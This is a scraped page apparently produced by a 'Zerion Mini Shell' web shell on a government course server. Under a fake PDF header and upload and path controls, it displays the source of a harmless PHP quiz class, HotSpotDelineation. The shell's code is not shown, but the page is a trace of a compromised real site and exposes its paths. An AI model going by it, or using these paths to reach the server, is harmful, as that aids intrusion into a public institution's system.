%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/tjamichg/cursos.tjamich.gob.mx/main/exercise/
Upload File :
Create Path :
Current File : //proc/self/root/home/tjamichg/cursos.tjamich.gob.mx/main/exercise/HotSpotDelineation.php

<?php

/* For licensing terms, see /license.txt */

/**
 * Class HotSpotDelineation.
 */
class HotSpotDelineation extends HotSpot
{
    public $typePicture = 'hotspot-delineation.png';
    public $explanationLangVar = 'HotspotDelineation';

    /**
     * HotSpotDelineation constructor.
     */
    public function __construct()
    {
        parent::__construct();
        $this->type = HOT_SPOT_DELINEATION;
    }
}

Zerion Mini Shell 1.0